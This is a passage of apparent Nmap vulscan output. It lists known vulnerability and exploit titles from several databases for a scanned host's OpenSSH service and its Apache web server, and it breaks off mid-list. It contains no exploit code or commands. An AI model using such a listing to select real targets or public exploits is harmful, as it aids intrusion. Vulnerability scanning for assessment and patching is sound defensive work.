6992| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
6993| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
6994| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
6995| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
6996| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
6997| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
6998| [61286] OpenSSH Remote Denial of Service Vulnerability
6999| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
7000| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
7001| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
7002| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
7003| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
7004| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
7005| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
7006| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
7007| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
7008| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
7009| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
7010| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
7011| [30794] Red Hat OpenSSH Backdoor Vulnerability
7012| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
7013| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
7014| [28531] OpenSSH ForceCommand Command Execution Weakness
7015| [28444] OpenSSH X Connections Session Hijacking Vulnerability
7016| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
7017| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
7018| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
7019| [20956] OpenSSH Privilege Separation Key Signature Weakness
7020| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
7021| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
7022| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
7023| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
7024| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
7025| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
7026| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
7027| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
7028| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
7029| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
7030| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
7031| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
7032| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
7033| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
7034| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
7035| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
7036| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
7037| [6168] OpenSSH Visible Password Vulnerability
7038| [5374] OpenSSH Trojan Horse Vulnerability
7039| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
7040| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
7041| [4241] OpenSSH Channel Code Off-By-One Vulnerability
7042| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
7043| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
7044| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
7045| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
7046| [2917] OpenSSH PAM Session Evasion Vulnerability
7047| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
7048| [2356] OpenSSH Private Key Authentication Check Vulnerability
7049| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
7050| [1334] OpenSSH UseLogin Vulnerability
7051|
7052| IBM X-Force - https://exchange.xforce.ibmcloud.com:
7053| [83258] GSI-OpenSSH auth-pam.c security bypass
7054| [82781] OpenSSH time limit denial of service
7055| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
7056| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
7057| [72756] Debian openssh-server commands information disclosure
7058| [68339] OpenSSH pam_thread buffer overflow
7059| [67264] OpenSSH ssh-keysign unauthorized access
7060| [65910] OpenSSH remote_glob function denial of service
7061| [65163] OpenSSH certificate information disclosure
7062| [64387] OpenSSH J-PAKE security bypass
7063| [63337] Cisco Unified Videoconferencing OpenSSH weak security
7064| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
7065| [45202] OpenSSH signal handler denial of service
7066| [44747] RHEL OpenSSH backdoor
7067| [44280] OpenSSH PermitRootLogin information disclosure
7068| [44279] OpenSSH sshd weak security
7069| [44037] OpenSSH sshd SELinux role unauthorized access
7070| [43940] OpenSSH X11 forwarding information disclosure
7071| [41549] OpenSSH ForceCommand directive security bypass
7072| [41438] OpenSSH sshd session hijacking
7073| [40897] OpenSSH known_hosts weak security
7074| [40587] OpenSSH username weak security
7075| [37371] OpenSSH username data manipulation
7076| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
7077| [37112] RHSA update for OpenSSH signal handler race condition not installed
7078| [37107] RHSA update for OpenSSH identical block denial of service not installed
7079| [36637] OpenSSH X11 cookie privilege escalation
7080| [35167] OpenSSH packet.c newkeys[mode] denial of service
7081| [34490] OpenSSH OPIE information disclosure
7082| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
7083| [32975] Apple Mac OS X OpenSSH denial of service
7084| [32387] RHSA-2006:0738 updates for openssh not installed
7085| [32359] RHSA-2006:0697 updates for openssh not installed
7086| [32230] RHSA-2006:0298 updates for openssh not installed
7087| [32132] RHSA-2006:0044 updates for openssh not installed
7088| [30120] OpenSSH privilege separation monitor authentication verification weakness
7089| [29255] OpenSSH GSSAPI user enumeration
7090| [29254] OpenSSH signal handler race condition
7091| [29158] OpenSSH identical block denial of service
7092| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
7093| [25116] OpenSSH OpenPAM denial of service
7094| [24305] OpenSSH SCP shell expansion command execution
7095| [22665] RHSA-2005:106 updates for openssh not installed
7096| [22117] OpenSSH GSSAPI allows elevated privileges
7097| [22115] OpenSSH GatewayPorts security bypass
7098| [20930] OpenSSH sshd.c LoginGraceTime denial of service
7099| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
7100| [17213] OpenSSH allows port bouncing attacks
7101| [16323] OpenSSH scp file overwrite
7102| [13797] OpenSSH PAM information leak
7103| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
7104| [13264] OpenSSH PAM code could allow an attacker to gain access
7105| [13215] OpenSSH buffer management errors could allow an attacker to execute code
7106| [13214] OpenSSH memory vulnerabilities
7107| [13191] OpenSSH large packet buffer overflow
7108| [12196] OpenSSH could allow an attacker to bypass login restrictions
7109| [11970] OpenSSH could allow an attacker to obtain valid administrative account
7110| [11902] OpenSSH PAM support enabled information leak
7111| [9803] OpenSSH "
7112| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
7113| [9307] OpenSSH is running on the system
7114| [9169] OpenSSH "
7115| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
7116| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
7117| [8383] OpenSSH off-by-one error in channel code
7118| [7647] OpenSSH UseLogin option arbitrary code execution
7119| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
7120| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
7121| [7179] OpenSSH source IP access control bypass
7122| [6757] OpenSSH "
7123| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
7124| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
7125| [5517] OpenSSH allows unauthorized access to resources
7126| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
7127|
7128| Exploit-DB - https://www.exploit-db.com:
7129| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
7130| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
7131| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
7132| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
7133| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
7134| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
7135| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
7136| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
7137| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
7138| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
7139| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
7140| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
7141| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
7142| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
7143|
7144| OpenVAS (Nessus) - http://www.openvas.org:
7145| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
7146| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
7147| [881183] CentOS Update for openssh CESA-2012:0884 centos6
7148| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
7149| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
7150| [870763] RedHat Update for openssh RHSA-2012:0884-04
7151| [870129] RedHat Update for openssh RHSA-2008:0855-01
7152| [861813] Fedora Update for openssh FEDORA-2010-5429
7153| [861319] Fedora Update for openssh FEDORA-2007-395
7154| [861170] Fedora Update for openssh FEDORA-2007-394
7155| [861012] Fedora Update for openssh FEDORA-2007-715
7156| [840345] Ubuntu Update for openssh vulnerability USN-597-1
7157| [840300] Ubuntu Update for openssh update USN-612-5
7158| [840271] Ubuntu Update for openssh vulnerability USN-612-2
7159| [840268] Ubuntu Update for openssh update USN-612-7
7160| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
7161| [840214] Ubuntu Update for openssh vulnerability USN-566-1
7162| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
7163| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
7164| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
7165| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
7166| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
7167| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
7168| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
7169| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
7170| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
7171| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
7172| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
7173| [100584] OpenSSH X Connections Session Hijacking Vulnerability
7174| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
7175| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
7176| [65987] SLES10: Security update for OpenSSH
7177| [65819] SLES10: Security update for OpenSSH
7178| [65514] SLES9: Security update for OpenSSH
7179| [65513] SLES9: Security update for OpenSSH
7180| [65334] SLES9: Security update for OpenSSH
7181| [65248] SLES9: Security update for OpenSSH
7182| [65218] SLES9: Security update for OpenSSH
7183| [65169] SLES9: Security update for openssh,openssh-askpass
7184| [65126] SLES9: Security update for OpenSSH
7185| [65019] SLES9: Security update for OpenSSH
7186| [65015] SLES9: Security update for OpenSSH
7187| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
7188| [61639] Debian Security Advisory DSA 1638-1 (openssh)
7189| [61030] Debian Security Advisory DSA 1576-2 (openssh)
7190| [61029] Debian Security Advisory DSA 1576-1 (openssh)
7191| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
7192| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
7193| [60667] Slackware Advisory SSA:2008-095-01 openssh
7194| [59014] Slackware Advisory SSA:2007-255-01 openssh
7195| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
7196| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
7197| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
7198| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
7199| [57492] Slackware Advisory SSA:2006-272-02 openssh
7200| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
7201| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
7202| [57470] FreeBSD Ports: openssh
7203| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
7204| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
7205| [56294] Slackware Advisory SSA:2006-045-06 openssh
7206| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
7207| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
7208| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
7209| [53788] Debian Security Advisory DSA 025-1 (openssh)
7210| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
7211| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
7212| [11343] OpenSSH Client Unauthorized Remote Forwarding
7213| [10954] OpenSSH AFS/Kerberos ticket/token passing
7214| [10883] OpenSSH Channel Code Off by 1
7215| [10823] OpenSSH UseLogin Environment Variables
7216|
7217| SecurityTracker - https://www.securitytracker.com:
7218| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
7219| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
7220| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
7221| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
7222| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
7223| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
7224| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
7225| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
7226| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
7227| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
7228| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
7229| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
7230| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
7231| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
7232| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
7233| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
7234| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
7235| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
7236| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
7237| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
7238| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
7239| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
7240| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
7241| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
7242| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
7243| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
7244| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
7245| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
7246| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
7247| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
7248| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
7249| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
7250| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
7251| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
7252| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
7253| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
7254| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
7255| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
7256|
7257| OSVDB - http://www.osvdb.org:
7258| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
7259| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
7260| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
7261| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
7262| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
7263| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
7264| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
7265| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
7266| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
7267| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
7268| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
7269| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
7270| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
7271| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
7272| [56921] OpenSSH Unspecified Remote Compromise
7273| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
7274| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
7275| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
7276| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
7277| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
7278| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
7279| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
7280| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
7281| [43745] OpenSSH X11 Forwarding Local Session Hijacking
7282| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
7283| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
7284| [37315] pam_usb OpenSSH Authentication Unspecified Issue
7285| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
7286| [34601] OPIE w/ OpenSSH Account Enumeration
7287| [34600] OpenSSH S/KEY Authentication Account Enumeration
7288| [32721] OpenSSH Username Password Complexity Account Enumeration
7289| [30232] OpenSSH Privilege Separation Monitor Weakness
7290| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
7291| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
7292| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
7293| [29152] OpenSSH Identical Block Packet DoS
7294| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
7295| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
7296| [22692] OpenSSH scp Command Line Filename Processing Command Injection
7297| [20216] OpenSSH with KerberosV Remote Authentication Bypass
7298| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
7299| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
7300| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
7301| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
7302| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
7303| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
7304| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
7305| [6601] OpenSSH *realloc() Unspecified Memory Errors
7306| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
7307| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
7308| [6072] OpenSSH PAM Conversation Function Stack Modification
7309| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
7310| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
7311| [5408] OpenSSH echo simulation Information Disclosure
7312| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
7313| [4536] OpenSSH Portable AIX linker Privilege Escalation
7314| [3938] OpenSSL and OpenSSH /dev/random Check Failure
7315| [3456] OpenSSH buffer_append_space() Heap Corruption
7316| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
7317| [2140] OpenSSH w/ PAM Username Validity Timing Attack
7318| [2112] OpenSSH Reverse DNS Lookup Bypass
7319| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
7320| [1853] OpenSSH Symbolic Link 'cookies' File Removal
7321| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
7322| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
7323| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
7324| [688] OpenSSH UseLogin Environment Variable Local Command Execution
7325| [642] OpenSSH Multiple Key Type ACL Bypass
7326| [504] OpenSSH SSHv2 Public Key Authentication Bypass
7327| [341] OpenSSH UseLogin Local Privilege Escalation
7328|_
732925/tcp closed smtp
733080/tcp open http Apache httpd
7331|_http-server-header: Apache
7332| vulscan: VulDB - https://vuldb.com:
7333| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
7334| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
7335| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
7336| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
7337| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
7338| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
7339| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
7340| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
7341| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
7342| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
7343| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
7344| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
7345| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
7346| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
7347| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
7348| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
7349| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
7350| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
7351| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
7352| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
7353| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
7354| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
7355| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
7356| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
7357| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
7358| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
7359| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
7360| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
7361| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
7362| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
7363| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
7364| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
7365| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
7366| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
7367| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
7368| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
7369| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
7370| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
7371| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
7372| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
7373| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
7374| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
7375| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
7376| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
7377| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
7378| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
7379| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
7380| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
7381| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
7382| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
7383| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
7384| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
7385| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
7386| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
7387| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
7388| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
7389| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
7390| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
7391| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
7392| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
7393| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
7394| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
7395| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
7396| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
7397| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
7398| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
7399| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
